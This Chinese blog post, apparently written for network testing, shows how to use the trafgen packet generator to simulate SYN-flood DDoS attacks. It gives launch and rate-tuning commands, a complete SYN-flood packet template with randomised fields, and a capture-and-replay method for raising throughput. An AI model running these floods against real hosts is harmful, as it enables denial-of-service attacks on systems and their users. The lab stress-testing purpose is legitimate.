高性能流量生成工具trafgen(DDoS模拟)

最新推荐文章于 2024-05-23 10:45:00 发布
最新推荐文章于 2024-05-23 10:45:00 发布
阅读量9.8k 收藏 15
点赞数 5
分类专栏: 测试相关

工具选择

  1. 开源的流量生成工具很多,可用于模拟DoS攻击的工具也不在少数,如hping、scapy(python库)等等,但均存在着不足,如性能不够,不能模拟DDoS攻击(攻击流IP和PORT不能动态变化)
  2. 通过详细的对比测试(同hping、scapy、LOIC等对比测试,具体数据不宜公开),最后统一选择了netsniff-ng套件中的trafgen攻击,其在测试环境中可达到24万pps的SYNFLOOD攻击,是一款高速、多线程网络数据包生成工具
  3. trafgen 工具能够动态生成攻击IP和端口号,能够通过配置文件动态修改攻击包的内容

简单使用

1. 安装

trafgen属于netsniff-ng套件,是一款linux下的工具,安装很方便,通过系统的在线安装工具即可完成安装,如centos下yum install netsniff-ng即可

2. 使用(SYN Flood攻击)

  1. 工具的比较简单,主要是配置文件的编写,假设已经写好了一个synflood配置文件

    • 键入命令trafgen --cpp --dev ens33 --conf synflood.trafgen --verbose即可发起攻击
    • 进一步的还可通过trafgen --cpp --dev ens33 --conf synflood.trafgen --verbose --gap 1000 (以毫秒为单位)来调节速度
    • 进一步的还可通过trafgen --cpp --dev ens33 --conf synflood.trafgen --verbose --kernel-pull 20 (默认10us)来调节速度
    • 详细的可以man trafgen

  2. 配置文件解读(以synflood.trafgen文件为例)

    • synflood.trafgen 模版,trafgen就是通过该文件来生成特定的数据包的!看配置文件的注释基本能清除如何修改
/* TCP SYN attack ( 64byte )
 * Command example:
 *  trafgen --cpp --dev em2 --conf synflood.trafgen --verbose
 * Note: dynamic elements "drnd()" make trafgen slower
 */

#define ETH_P_IP    0x0800

#define SYN     (1 << 1)
#define ACK     (1 << 4)
#define ECN     (1 << 6)

{
  /* --- Ethernet Header --- */
  /* NEED ADJUST */
  // 0x00, 0x12, 0xc0, 0x02, 0xac, 0x56,  # MAC Destination
  // 0x00, 0x12, 0xc0, drnd(3),  # MAC Source
  0xf4, 0xe9, 0xd4, 0x8d, 0x04, 0x82, # MAC Destination
  0xf4, 0xe9, 0xd4, 0x8c, 0xe2, 0xa2, # MAC Source

  const16(ETH_P_IP),
  /* IPv4 Version, IHL, TOS */
  0b01000101, 0,
  /* IPv4 Total Len */
  const16(46),
  /* IPv4 Ident */
  drnd(2),
  //const16(2),

  /* IPv4 Flags, Frag Off */
  0b01000000, 0,
  /* IPv4 TTL */
  64,
  /* Proto TCP */
  0x06,
  /* IPv4 Checksum (IP header from, to) */
  csumip(14, 33),

  /* NEED ADJUST */
  // 10, 10, 88, drnd(1), # Source IP
  10, 10, 88, 173,  # Source IP
  10, 10, 88, 172, # Dest IP

  /* TCP Source Port */
  drnd(2),
  /* TCP Dest Port */
  const16(80),
  /* TCP Sequence Number */
  drnd(4),
  /* TCP Ackn. Number */
  const32(0), /* NOTICE ACK==zero with SYN packets */

  /* TCP Header length + Flags */
  //const16((0x5 << 12) | SYN | ECN)    /* TCP SYN+ECN Flag */
  //const16((0x5 << 12) | SYN | ACK)    /* TCP SYN+ACK Flag */
  const16((0x5 << 12) | SYN)        /* TCP SYN Flag */
  //const16((0x5 << 12) | ACK)      /* TCP ACK Flag */

  /* Window Size */
  const16(16),
  /* TCP Checksum (offset IP, offset TCP) */
  csumtcp(14, 34),
  const16(0), /*PAD*/

  /* Data */
  "SYNswf"
}
  • 配置文件可通过drnd()函数来实现对应内容的动态生成,如IP、MAC地址等,但是会影响性能

image_1b6bf8ooa3im1ioc1kc7aeu1qo89.png-6kB

  • 修改MAC地址(攻击/被攻击MAC地址)

image_1b6bfeukr5m628h14ciupq1tnnm.png-11.8kB

  • 修改IP地址和攻击协议及端口号,const16()将对应的十进制数转换成一个16位的二进制数

image_1b6bftaek14a4il1fp5l3dr5213.png-15kB

  • 修改位SYN标志(根据情况也可修改为其他的)

image_1b6bfv9751ojs1g6klulc4jaak1g.png-11.6kB

3. ACKFlood 攻击

4. UDP fragment 攻击

5. 退出命令

统一退出命令pgrep trafgen | xargs kill -s 9

其他

  1. 在trafgen性能仍达不到要求的情况下,可通过netsniff-ng攻击进行流量回放,如下
    • 先捕获synfloog攻击数据包
      netsniff-ng --in ens33 --out synflood.pcap --silent --verbose --filter 'ether src 00:50:56:ab:a5:3f'
      trafgen --cpp --dev ens33 --conf synflood.trafgen --verbose
    • 再重放synflood攻击数据包
      netsniff-ng --in synflood.pcap --out ens33 --silent --prio-high --verbose
daisy2753
关注
  • 5
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
githubpythonddos_高性能流量生成工具trafgen(DDoS模拟)
weixin_39612896的博客
12-22 569
synflood.trafgen 模版,trafgen就是通过该文件来生成特定的数据包的!看配置文件的注释基本能清除如何修改/* TCP SYN attack ( 64byte )* Command example:* trafgen --cpp --dev em2 --conf synflood.trafgen --verbose* Note: dynamic elements "drnd()...
DOS攻击工具介绍
frankwhere的博客
03-24 6911
DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源, 目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃 然而随着网络上免费的可用DDoS工具增多,DoS攻击也日益增长,下面介绍几款Hacker常用的DoS攻击工具。 特别提示:仅用于攻防演练及教学测试用途,禁止非法使用。 1、卢瓦(LO...
tfgen 用于带宽,线路,交换机压力测试
12-04
tfgen是一款优秀的网络设备,线路或者服务器最大流量的压力测试软件 测试交换机或线路的方法::: 1.线路两端或交换机上的两台PC之间配同一个子网的ip地址(路由器的话你应该知道如何把网络设通) 2.两台交换机关闭防火墙,并允许ping 3.两台pc都打开tfGen, 设置目标地址以及流量大小, 互相发包 4.两台pc都装上类似DuMeter的软件观测实时流量 5.两台pc之间再互相ping, 看延时和丢包率 就可良完美的检查线路或交换机最大带宽或者检查线路的健康程度. 不会用打屁股!
【网络安全】免费DDOS攻击测试工具_免费ddos平台攻击
最新发布
qq_44005305的博客
05-23 1229
通常,DDoS 攻击的目的是使网站崩溃。DDoS 攻击的持续时间取决于攻击是在网络层还是应用层。网络层攻击持续时间最长为 48 到 49 小时。应用层攻击持续时间最长为 60 到 70 天。根据 1990 年的《计算机滥用法》,DDoS 或任何其他类似的攻击都是非法的。由于它是非法的,攻击者可能会受到监禁的惩罚。DDoS 攻击有 3 种类型:基于容量的攻击,协议攻击,以及应用层攻击。
DDOS流量攻击
浅笑996的博客
12-16 1740
DDOS直接流量攻击实验 实验目的 学习基本的DDOS工具使用 hping3 netsniffer – trafgen 实验环境 包含2台主机 attact 作为攻击方,使用Centos7.2 windows_server ,用于被攻击,同时抓包分析流量 ,任意版本均可。安装wireshark,用于抓包 实验步骤 使用hping hping官网帮助信息 查看帮助信息 hping --help ...
网络流量生成
09-21
CICFlowMeter是一个网络流量生成器,它使用Java编写,在选择要计算的功能,添加新功能以及更好地控制流超时的持续时间方面提供了更大的灵活性。它生成双向流(Biflow),其中第一个数据包确定前向(源到目的地)和后向(目标到源)方向,因此有83个统计特征,如持续时间,数据包数,字节数,数据包长度,也可以在正向和反向分别计算。 应用程序的输出采用CSV文件格式,每个流标记有六列,即FlowID,SourceIP,DestinationIP,SourcePort,DestinationPort和具有80多个网络流量功能的协议。通常,TCP流在连接拆除时(通过FIN数据包)终止,而UDP流由流超时终止。流量超时值可以由各个方案任意分配,例如, TCP和UDP均为600秒。 CICFlowMeter-V3可以提取80多个功能。 该实验室用此生成器获取了IDS数据集,2012和2017的都有,2017版的数据集我会作为新资源上传。同样的,采用该数据集做实验的,请私信我,应数据方要求,需要在论文中声明数据出处。
基于GO语言开发的高性能负载测试工具
11-04
【基于GO语言开发的高性能负载测试工具】 Go(也称为Golang)是一种由Google开发的开源编程语言,设计时特别注重简洁、效率和可移植性。由于其内建的并发模型和高效的垃圾回收机制,Go语言非常适合用于开发高性能的...
网络流量分析 流量分析工具 v1.6
10-22
《网络流量分析与流量分析工具 v1.6详解》 在现代网络环境中,网络流量分析是维护网络安全、优化网络性能的重要手段。流量分析工具作为这一领域的利器,可以帮助我们有效地进行网络故障排查,深入理解网络流量状况...
流量分析工具 科来网络分析32.zip
05-28
通过分析网络流量,我们可以发现潜在的性能瓶颈,识别异常流量模式,预防和解决网络安全问题,如DDoS攻击、病毒传播等。科来网络分析32正是这样一款能够帮助我们深入洞察网络行为的专业工具。 该工具的核心功能包括...
TFGEN网络测试工具
01-03
A good traffic (unicast, multicast and broadcast)generator for testing.
mgen:多生成器(MGEN)流量生成工具
05-20
MGEN Version 5.x 该目录包含NRL Multi-Generator(MGEN)测试工具集版本5.x的源代码。 MGEN版本5基于MGEN 4.2b6。 传输类已抽象,并添加了新功能。 需要Protolib: //www.nrl.navy.mil/itd/ncs/products/protolib The MGEN build expects the "protolib" source tree (or a symbolic link to it) to be located in the top level of the "mgen" source tree. For example, to download and build on Linux: git clone https://github.com/USNavalResearchLaboratory/
模拟网络流量awk测试脚本
04-06
很小的一个脚本,里面有两个函数可以生成随即ip和随即时间,你可以自己构造模拟流量格式。默认流量模式为ip ip port port length time 运行:awk -f flowcreate.awk 文件名 会自动在文件后加入10条模拟流量 脚本是在linux下写的,在windows下记事本打开格式很乱,dev打开格式还是很好的。
在centos上编译netsniff-ng所需要的几个小工具
06-27
个人在centos上编译netsniff-ng,整理的几个需要的小工具: userspace-rcu libsodium-master libnet-1.2-rc3 GeoIP-1.4.8
apache性能测试工具ab使用详解
09-15
工作原理类似于CC(Challenge Collapsar)攻击,但AB是合法的性能测试工具,不是恶意的DDoS攻击。不过,使用时需要注意不要一次性施加过大的负载,以免对服务器造成负面影响。 2. **AB的安装** 在Linux环境下,...
Windows服务器应对高并发和DDOS攻击的配置方法
09-30
主要介绍了Windows服务器应对高并发和DDOS攻击的配置方法,本文讲解了应对高并发请求、应对DDOS攻击的多种配置方法,需要的朋友可以参考下
[编辑中] 免费的Internet流量发生器 | Free Internet Traffic Generators
weixin_30455067的博客
11-10 551
流量发生器 (Traffic Generator) 是用来检测网络性能,进行网络相关研究的一个很重要的工具。大家可能用过Iperf或者IxChariot,前者是类UNIX环境下的一个免费、开源的网络性能测试工具,主要用来测试链路速率;后者则是一个非常专业的商业工具,拥有非常友好的图形界面。 作为网络工程师和研究人员,有时我们可能会需要一些具有特定功能的流量发生器,但是目前网络上可以找到的相关工具...
ads抗ddos系统的模拟实现
06-06
ADS(Anti-DDoS System)是一种防御分布式拒绝服务攻击(DDoS)的系统,其基本原理是将来自同一IP地址或相同类型的流量进行聚合,并进行流量过滤和清洗,以减轻服务器和网络设备的负担。 模拟实现ADS抗DDoS系统的步骤如下: 1. 收集流量数据:通过网络监测工具(如Wireshark等)收集网络流量数据,包括源IP地址、目标IP地址、协议类型、端口号等信息。 2. 流量聚合:将相同的IP地址或相同类型的流量进行聚合,形成一个数据集。 3. 流量过滤:对聚合后的数据集进行流量过滤,剔除非法流量和恶意攻击流量。 4. 流量清洗:将过滤后的数据集进行流量清洗,去除包含恶意代码的数据包。 5. 负载均衡:将清洗后的流量通过负载均衡技术分配到不同的服务器上,以避免单点故障。 6. 防火墙保护:设置防火墙规则,过滤掉恶意流量和攻击流量。 7. 实时监测:对整个系统进行实时监测,及时发现和处理可能的攻击行为。 通过以上步骤,模拟实现ADS抗DDoS系统,可以有效降低服务器和网络设备的负担,提高系统的稳定性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值